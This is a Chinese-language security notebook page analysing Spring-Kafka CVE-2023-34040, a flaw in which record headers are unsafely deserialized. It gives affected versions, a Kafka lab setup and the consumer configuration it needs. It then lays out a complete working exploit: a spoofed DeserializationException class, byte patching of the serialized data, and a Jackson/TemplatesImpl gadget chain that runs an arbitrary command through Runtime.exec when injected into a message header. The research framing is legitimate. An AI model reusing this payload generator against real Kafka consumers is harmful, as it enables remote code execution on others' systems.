Java
  • About This Book
  • 🍖Prerequisites
    • 反射
      • 反射基本使用
      • 高版本JDK反射绕过
      • 反射调用命令执行
      • 反射构造HashMap
      • 方法句柄
    • 类加载
      • 动态加载字节码
      • 双亲委派模型
      • BCEL
      • SPI
    • RMI & JNDI
      • RPC Intro
      • RMI
      • JEP 290
      • JNDI
    • Misc
      • Unsafe
      • 代理模式
      • JMX
      • JDWP
      • JPDA
      • JVMTI
      • JNA
      • Java Security Manager
  • 👻Serial Journey
    • URLDNS
    • SerialVersionUID
    • Commons Collection 🥏
      • CC1-TransformedMap
      • CC1-LazyMap
      • CC6
      • CC3
      • CC2
    • FastJson 🪁
      • FastJson-Basic Usage
      • FastJson-TemplatesImpl
      • FastJson-JdbcRowSetImpl
      • FastJson-BasicDataSource
      • FastJson-ByPass
      • FastJson与原生反序列化(一)
      • FastJson与原生反序列化(二)
      • Jackson的原生反序列化利用
    • Other Components
      • SnakeYaml
      • C3P0
      • AspectJWeaver
      • Rome
      • Spring
      • Hessian
      • Hessian_Only_JDK
      • Kryo
      • Dubbo
  • 🌵RASP
    • JavaAgent
    • JVM
    • ByteCode
    • JNI
    • ASM 🪡
      • ASM Intro
      • Class Generation
      • Class Transformation
    • Rasp防御命令执行
    • OpenRASP
  • 🐎Memory Shell
    • Tomcat-Architecture
    • Servlet API
      • Listener
      • Filter
      • Servlet
    • Tomcat-Middlewares
      • Tomcat-Valve
      • Tomcat-Executor
      • Tomcat-Upgrade
    • Agent MemShell
    • WebSocket
    • 内存马查杀
    • IDEA本地调试Tomcat
  • ✂️JDBC Attack
    • MySQL JDBC Attack
    • H2 JDBC Attack
  • 🎨Templates
    • FreeMarker
    • Thymeleaf
    • Enjoy
  • 🎏MessageQueue
    • ActiveMQ CNVD-2023-69477
    • AMQP CVE-2023-34050
    • Spring-Kafka CVE-2023-34040
    • RocketMQ CVE-2023-33246
  • 🛡️Shiro
    • Shiro Intro
    • Request URI ByPass
    • Context Path ByPass
    • Remember Me反序列化 CC-Shiro
    • CB1与无CC依赖的反序列化链
  • 🍺Others
    • Deserialization Twice
    • A New Blazer 4 getter RCE
    • Apache Commons Jxpath
    • El Attack
    • Spel Attack
    • C3P0原生反序列化的JNDI打法
    • Log4j
    • Echo Tech
      • SpringBoot Under Tomcat
    • CTF 🚩
      • 长城杯-b4bycoffee (ROME反序列化)
      • MTCTF2022(CB+Shiro绕过)
      • CISCN 2023 西南赛区半决赛 (Hessian原生JDK+Kryo反序列化)
      • CISCN 2023 初赛 (高版本Commons Collections下其他依赖的利用)
      • CISCN 2021 总决赛 ezj4va (AspectJWeaver写字节码文件到classpath)
      • D^3CTF2023 (新的getter+高版本JNDI不出网+Hessian异常toString)
      • WMCTF2023(CC链花式玩法+盲读文件)
      • 第六届安洵杯网络安全挑战赛(CB PriorityQueue替代+Postgresql JDBC Attack+FreeMarker)
  • 🔍Code Inspector
    • CodeQL 🧶
      • Tutorial
        • Intro
        • Module
        • Predicate
        • Query
        • Type
      • CodeQL 4 Java
        • Basics
        • DFA
        • Example
    • SootUp ✨
      • Intro
      • Jimple
      • DFA
      • CG
    • Tabby 🔦
      • install
    • Theory
      • Static Analysis
        • Intro
        • IR & CFG
        • DFA
        • DFA-Foundation
        • Interprocedural Analysis
        • Pointer Analysis
        • Pointer Analysis Foundation
        • PTA-Context Sensitivity
        • Taint Anlysis
        • Datalog
Powered by GitBook
On this page
  • Preface
  • Kafka Intro
  • Quick Start
  • Analysis
  • Patch
  • Ref

Was this helpful?

  1. 🎏MessageQueue

Spring-Kafka CVE-2023-34040

Preface

官方的描述:在受影响的版本,若存在不安全的配置,攻击者能够构造恶意的序列化对象,在反序列化记录头时触发。

漏洞条件:

  • 用户没有配置ErrorHandlingDeserializer

  • 用户显式设置checkDeserExWhenKeyNull和checkDeserExWhenValueNull为true

  • 用户允许未受信任源往Kafka主题发布消息

攻击对象:

  • consumer

影响版本:

  • Spring-Kafka

    • 2.8.1 ~ 2.9.10

    • 3.0.0 ~ 3.0.9

Kafka Intro

Kafka是一个分布式的基于发布/订阅模式的消息队列

发布订阅模式的工作原理:

  • Publisher将消息发布到Topic中,同时有多个Subscriber消费该消息

  • 和Peer to Peer不同,发布到Topic的消息会被多个订阅者消费

  • Topic:消息的主题,可以理解为消息队列,kafka的数据就保存在topic。在每个broker可以创建多个topic。

  • Partition:Topic的分区,每个topic可以有多个分区,分区的作用是做负载,提高kafka的吞吐量。同一个topic在不同的分区的数据是不重复的,partition 的表现形式就是一个一个的文件夹。分区的意思就是说,如果你创建的topic有5个分区,当你一次性向kafka中推 1000 条数据时,这1000条数据默认会分配到5个分区中,其中每个分区存储200条数据

  • Consumer Group:将多个消费者组成一个消费者组,在kafka的设计中同一个分区的数据只能被消费者组中的某一个消费者消费。同一个消费者组的消费者可以消费同一个topic的不同分区的数据

Kafka的记录也称为Message或Event,由Header和Body组成。头部存储如主题、分区、时间戳等元数据,主体为键值对。

Quick Start

Kafka环境搭建,依赖于zookeeper

如果不是在本机搭建,下面的KAFKA_ADVERTISED_LISTENERS改成自己的IP;本机搭建的话localhost就好了

version: '2'
services:
  zookeeper:
    image: confluentinc/cp-zookeeper:latest
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181
      ZOOKEEPER_TICK_TIME: 2000
    ports:
      - 22181:2181
  
  kafka:
    image: confluentinc/cp-kafka:latest
    depends_on:
      - zookeeper
    ports:
      - 29092:29092
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://192.168.73.129:29092
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1

客户端(生产者和消费者)跟着官方文档来,以2.9.10为例

https://docs.spring.io/spring-kafka/docs/2.9.10/reference/html/#getting-started

使用Spring Initializr快速构造项目,它会自动寻找与spring版本对应的spring-kafka版本

Producer:

package com.demo.producer;

import org.apache.kafka.clients.admin.NewTopic;
import org.springframework.boot.ApplicationRunner;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.config.TopicBuilder;
import org.springframework.kafka.core.KafkaTemplate;

@SpringBootApplication
public class ProducerApplication {

    public static void main(String[] args) {
        SpringApplication.run(ProducerApplication.class, args);
    }

    @Bean
    public NewTopic topic() {
        return TopicBuilder.name("myTopic")
                .partitions(10)
                .replicas(1)
                .build();
    }

    @Bean
    public ApplicationRunner runner(KafkaTemplate<String, String> template) {
        return args -> {
            template.send("myTopic", "test");
        };
    }
}
server.port=8080
spring.kafka.bootstrap-servers=192.168.73.129:29092

Consumer:

package com.demo.comsumer;

import org.apache.kafka.clients.admin.NewTopic;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.TopicBuilder;

@SpringBootApplication
public class ConsumerApplication {

    public static void main(String[] args) {
        SpringApplication.run(ConsumerApplication.class, args);
    }
    @Bean
    public NewTopic topic() {
        return TopicBuilder.name("myTopic")
            .partitions(10)
            .replicas(1)
            .build();
    }
    @Autowired
    private KafkaProperties kafkaProperties;

    @Bean
    public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
        Map<String, Object> props = new HashMap<>();
        props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers());
        props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
        props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);

        ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
        factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props));
        factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
        factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
        return factory;
    }

    @KafkaListener(id = "myId", topics = "myTopic")
    public void listen(String in) {
        System.out.println(in);
    }
}
server.port=8088
spring.kafka.consumer.auto-offset-reset=earliest
spring.kafka.bootstrap-servers=192.168.73.129:29092

启动生产者和消费者,消费者端成功接收到消息

Analysis

由官方文档可知,当设置checkDeserExWhenKeyNull和checkDeserExWhenValueNull为true,若接收到的消息key或value为空,会检查DeserializationException头部

org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader

从记录头里获取KEY_DESERIALIZER_EXCEPTION_HEADER(即这里的springDeserializerExceptionKey)对应的值,并尝试反序列化得到DeserializationException对象。

调用栈往上走两步,这里判断记录的key或value是否为null,以及对应的checkNullKeyForExceptions或checkNullValueForExceptions是否开启

可以发现我们用MessageBuilder.withPayload构造的消息只有value没有key

进入byteArrayToDeserializationException

构造了一个ObjectInputStream对象来对记录头的值进行反序列化,重写了resolveClass方法

反序列化的时候会判断首个类的类名是否为org.springframework.kafka.support.serializer.DeserializationException

第一次判断后first就被设为false了,也就是其内部嵌套的类就没有这个限制了。

但是看一下这个DeserializationException的属性成员,发现没有可以被利用的成员

这里使用一个取巧的方法,直接在当前classpath下放上我们修改后的DeserializationException类,为不和项目依赖的类冲突,把包名的开头org修改为xrg,后面再把序列化得到数据中的包名改回来。

但存在一个问题,修改原有类后会造成serialVersionUID的变化,反序列化时会检测这个值,若和接收方计算的不一致就会抛出异常。

我们可以在修改后的类里把serialVersionUID写死了。

import org.springframework.kafka.support.serializer.DeserializationException;

import java.io.ObjectStreamClass;
import java.lang.reflect.Constructor;

public class Calc {
    public static void main(String[] args) throws Exception {
        Class<?> clazz = Class.forName("java.io.ObjectStreamClass");
        Constructor<?> con = clazz.getDeclaredConstructor(Class.class);
        con.setAccessible(true);
        ObjectStreamClass osc = (ObjectStreamClass) con.newInstance(DeserializationException.class);
        System.out.println(osc.getSerialVersionUID());
    }
}
package xrg.springframework.kafka.support.serializer;

import java.io.Serializable;

public class DeserializationException implements Serializable {

    private static final long serialVersionUID = 8280022391259546509L;

    private Object evil;

    public DeserializationException(Object evil) {
        this.evil = evil;
    }
}

既然是spring-kafka的应用,大概率配有spring-boot-starter-web依赖(别问为什么,因为官方提供的Demo也依赖了spring-web)

那就打Spring-Web自带的Jackson利用链,参考网上师傅修改过后的稳定版本的链子。

修改生产者的代码:

static {
    try {
        CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
        CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
        ctClass.removeMethod(writeReplace);
        ctClass.toClass();
    } catch (Exception e) {
        throw new RuntimeException(e);
    }
}
@Bean
public ApplicationRunner runner(KafkaTemplate<Object, Object> template) {
    return args -> {
        ProducerRecord<Object,Object> producerRecord = new ProducerRecord<>("myTopic","key",null);
        producerRecord.headers().add("springDeserializerExceptionValue", PayloadGeneration.getPayload("calc"));
        template.send(MessageBuilder
                      .withPayload("whatever")
                      .setHeader(KafkaHeaders.TOPIC, "myTopic")
                      .setHeader(SerializationUtils.KEY_DESERIALIZER_EXCEPTION_HEADER, PayloadGeneration.getPayload("calc")).build());
    };
}
package com.demo.producer;

import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.aop.framework.AdvisedSupport;
import xrg.springframework.kafka.support.serializer.DeserializationException;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class PayloadGeneration {
    public static byte[] ser(final Object obj) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream  oos= new ObjectOutputStream(baos);
        oos.writeObject(obj);
        return baos.toByteArray();
    }
    public static byte[] getPayload(String cmd) throws Exception {
        POJONode node = new POJONode(makeTemplatesImplAopProxy(cmd));
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        setFieldValue(val, "val", node);

        DeserializationException exception = new DeserializationException(val);
        byte[] data = ser(exception);
        data[8] = "o".getBytes()[0]; // AC ED 00 05 74 00 05 68
        return data;
    }
    public static Object makeTemplatesImpl(String cmd) throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
        clazz.addConstructor(constructor);
        byte[][] bytes = new byte[][]{clazz.toBytecode()};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", bytes);
        setFieldValue(templates, "_name", "test");
        setFieldValue(templates, "_tfactory", null);
        return templates;
    }
    public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
        AdvisedSupport advisedSupport = new AdvisedSupport();
        advisedSupport.setTarget(makeTemplatesImpl(cmd));
        Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
        constructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
        return proxy;
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

Patch

限制记录头只能是DeserializationException类型,客户端控制不了。

Ref

  • https://spring.io/security/cve-2023-34040

  • https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040

  • https://xz.aliyun.com/t/12846

  • https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d

  • https://blog.pyn3rd.com/2023/09/15/CVE-2023-34040-Spring-Kafka-Deserialization-Remote-Code-Execution/

PreviousAMQP CVE-2023-34050NextRocketMQ CVE-2023-33246

Last updated 1 year ago

Was this helpful?

image-20231221211910025
image-20231221211920223
image-20231221211930410
image-20231221211943657
image-20231221211950104
image-20231221211957672
image-20231221212005073
image-20231221212011954
image-20231221212018768
image-20231221212037639
image-20231221212046819
image-20231221212141805